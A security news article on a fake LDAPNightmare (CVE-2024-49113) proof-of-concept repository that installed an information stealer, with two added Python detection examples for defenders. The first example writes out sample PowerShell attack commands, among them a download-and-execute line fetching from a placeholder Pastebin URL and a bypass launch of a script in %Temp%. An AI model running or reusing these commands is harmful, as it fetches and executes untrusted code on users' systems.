Security researchers are tricked into downloading and executing information-stealing malware by a fake proof-of-concept (PoC) exploit for CVE-2024-49113, dubbed LDAPNightmare.

During Microsoft’s monthly Patch Tuesday release in December 2024, two significant vulnerabilities identified as CVE-2024-49112 and CVE-2024-49113 in Windows Lightweight Directory Access Protocol (LDAP) were patched. 

CVE-2024-49112, with a 9.8 CVSS score, is a remote code execution (RCE) vulnerability that attackers can exploit by submitting specially crafted LDAP queries, allowing them to run arbitrary code on the target machine. 

A denial-of-service (DoS) vulnerability tracked as CVE-2024-49113 with a 7.5 CVSS score can be exploited to crash the LDAP service and cause interruptions in service.  

Both flaws were considered highly significant since LDAP is widely utilized in Windows environments.

Safebreach recently unveiled a proof-of-concept (PoC) exploit for a critical vulnerability in Windows Lightweight Directory Access Protocol (LDAP), tracked as CVE-2024-49112.


“Although the tactic of using PoC lures as a vehicle for malware delivery is not new, this attack still poses significant concerns, especially since it capitalizes on a trending issue that could potentially affect a larger number of victims”, TrendMicro said in a report shared with Cyber Security News.

Fake PoC Exploit For LDAPNightmare (CVE-2024-49113)

The PoC appears to be a fork of the original creator’s malicious repository. The original Python files were replaced with the executable poc.exe, which was packed with UPX. 

The executable’s unusual existence in a Python-based project raises suspicions, even though the repository initially appears to be normal.

Repository containing “poc.exe”

When a user runs the file, a PowerShell script is dropped into the %Temp% folder and executed. That script creates a Scheduled Job, which in turn runs an encoded script.

Once decoded, the script fetches another script from Pastebin that collects the public IP address of the victim's computer and uploads it via FTP.

According to researchers, the following data is gathered, compressed using ZIP, and then uploaded using hardcoded credentials to an external FTP server.

Computer information

Process list

Directory lists (Downloads, Recent, Documents, and Desktop)

Network IPs

Network adapters

Installed updates

Exfiltrating the gathered information (Source: TrendMicro)
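The execution chain described above (a downloaded executable spawning PowerShell on a script in %Temp%, a Scheduled Job carrying an encoded command, and a second stage pulled from Pastebin) is exactly the kind of sequence process-creation telemetry can surface. The following is an added example, not code from the TrendMicro report or from the malicious repository: it decodes PowerShell's -EncodedCommand argument (base64 of UTF-16LE text) and scores constructed sample events against the behaviours the report lists. The paths, file names, job name and Pastebin URL are placeholders, not indicators from the report.

```python
import base64
import re

# Constructed sample telemetry (NOT taken from the TrendMicro report): process-creation
# records in the shape an EDR or Sysmon Event ID 1 would produce for the chain described
# above. All paths, names and the Pastebin URL are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def encode_powershell(script: str) -> str:
    """-EncodedCommand takes base64 of the script as UTF-16LE; we build samples the same way."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


STAGE2 = ("Invoke-Expression (New-Object Net.WebClient)"
          ".DownloadString('https://pastebin.com/raw/PLACEHOLDER')")

SAMPLE_EVENTS = [
    # 1. the downloaded 'PoC' launches PowerShell on a script dropped in %Temp%
    {"image": PS, "parent": r"C:\Users\victim\Downloads\poc.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File "
                r"C:\Users\victim\AppData\Local\Temp\stage1.ps1"},
    # 2. that script registers a scheduled job whose body is an encoded command
    {"image": PS, "parent": PS,
     "cmdline": "powershell.exe -NoProfile -EncodedCommand " + encode_powershell(
         "Register-ScheduledJob -Name Updater -ScriptBlock { " + STAGE2 + " }")},
    # 3. benign: an administrator running a backup script interactively
    {"image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

# PowerShell accepts several abbreviations of -EncodedCommand; capture the base64 payload.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# A .ps1 under the user's %Temp% directory on the command line.
TEMP_PS1_RE = re.compile(r"\\AppData\\Local\\Temp\\\S*\.ps1", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the plaintext of an -EncodedCommand argument, or None if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(ev: dict) -> list:
    """Return the behaviours from the report that a single PowerShell event exhibits."""
    findings = []
    if "powershell" not in ev["image"].lower():
        return findings
    cmd = ev["cmdline"]
    if "\\downloads\\" in ev["parent"].lower():
        findings.append("powershell spawned by an executable run from the Downloads folder")
    if TEMP_PS1_RE.search(cmd):
        findings.append("powershell script executed from %Temp%")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded command")
        text = decoded.lower()
        if "register-scheduledjob" in text or "schtasks" in text:
            findings.append("scheduled job registered from encoded script")
        if "pastebin.com" in text:
            findings.append("next stage fetched from pastebin")
        if "downloadstring" in text and ("invoke-expression" in text or "iex" in text):
            findings.append("download-and-execute pattern")
    return findings


def analyse_events(events) -> dict:
    """Map event index -> findings, keeping only the events that triggered something."""
    result = {}
    for i, ev in enumerate(events):
        found = analyse_event(ev)
        if found:
            result[i] = found
    return result


if __name__ == "__main__":
    for idx, found in analyse_events(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(found)}")
```

Decoding the encoded command rather than alerting on its mere presence is what lets the rule name the Pastebin fetch and the Scheduled Job registration; in a real deployment the same checks would run over script-block logging (Event ID 4104) as well, where the decoded text is already available.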

Hence, download dependencies, libraries, and code only from reputable and official sources. Watch out for repositories whose contents do not match the tool or application they claim to host. 

Verify the identity of the organization or repository owner and look for anomalies or indications of malicious activity in the commit history and most recent modifications of the repository. 

Additionally, repositories that claim to be extensively used yet have very few stars, forks, or contributors should be avoided. Look for reviews, problems, or conversations regarding the repository to spot any warning signs.
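One of the checks above, a repository whose contents do not match what it claims to be, can be automated before anything in a cloned repository is run. The following is an added example, not code from the report or from any project it mentions: it profiles a checked-out directory by source-file extension, flags any file carrying a Windows PE header, and applies the well-known UPX heuristic (section names UPX0/UPX1 and the "UPX!" marker that stock UPX leaves in the file). The sample repository it builds is constructed for the demonstration, and its poc.exe is a stand-in byte string with a PE-shaped header, not a real executable.

```python
import struct
import tempfile
from collections import Counter
from pathlib import Path

SOURCE_EXT = {".py": "python", ".js": "javascript", ".c": "c", ".go": "go", ".rs": "rust"}
# Languages in which a shipped Windows binary has no place in a source repository.
INTERPRETED = {"python", "javascript"}
UPX_MARKERS = (b"UPX0", b"UPX1", b"UPX!")


def is_pe(data: bytes) -> bool:
    """True if the bytes start with a DOS 'MZ' stub whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def looks_upx_packed(data: bytes) -> bool:
    """Heuristic only: stock UPX leaves UPX0/UPX1 section names and a 'UPX!' marker."""
    return any(marker in data for marker in UPX_MARKERS)


def scan_repo(root: str) -> dict:
    """Profile the repository's source languages and list every PE file found in it."""
    root_path = Path(root)
    langs = Counter()
    findings = []
    for path in root_path.rglob("*"):
        if not path.is_file() or ".git" in path.parts:
            continue
        ext = path.suffix.lower()
        if ext in SOURCE_EXT:
            langs[SOURCE_EXT[ext]] += 1
        data = path.read_bytes()
        if is_pe(data):
            findings.append({"file": path.relative_to(root_path).as_posix(),
                             "kind": "pe-executable",
                             "upx": looks_upx_packed(data)})
    dominant = langs.most_common(1)[0][0] if langs else None
    for finding in findings:
        # A compiled Windows binary inside a Python/JavaScript project is the mismatch to flag.
        finding["mismatch"] = dominant in INTERPRETED
    return {"dominant_language": dominant, "findings": findings}


def _fake_upx_pe() -> bytes:
    """Constructed stand-in: PE-shaped header plus UPX markers. Not an executable."""
    header = bytearray(0x40)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)  # e_lfanew -> directly after the DOS header
    return bytes(header) + b"PE\x00\x00" + b"\x00" * 20 + b"UPX0" + b"\x00" * 4 + b"UPX1" + b"\x00" * 4 + b"UPX!"


def build_sample_repo(root: str) -> None:
    """Write a constructed Python-looking repository that ships a packed binary."""
    base = Path(root)
    (base / "README.md").write_text("# LDAP PoC\nRun poc.exe against the target.\n")
    (base / "poc.py").write_text("print('placeholder')\n")
    (base / "utils.py").write_text("def helper():\n    return 1\n")
    (base / "poc.exe").write_bytes(_fake_upx_pe())


def demo() -> dict:
    """Build the sample repository in a temporary directory and scan it."""
    root = tempfile.mkdtemp()
    build_sample_repo(root)
    return scan_repo(root)


if __name__ == "__main__":
    report = demo()
    print("dominant language:", report["dominant_language"])
    for f in report["findings"]:
        print(f"{f['file']}: {f['kind']}, upx={f['upx']}, mismatch={f['mismatch']}")
```

The PE check is deliberately structural (MZ stub plus e_lfanew plus the PE signature) rather than extension-based, so a binary renamed to .dat or .bin is still caught; the UPX test is a hint for a reviewer, not proof of malice, since plenty of legitimate tools are UPX-packed.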
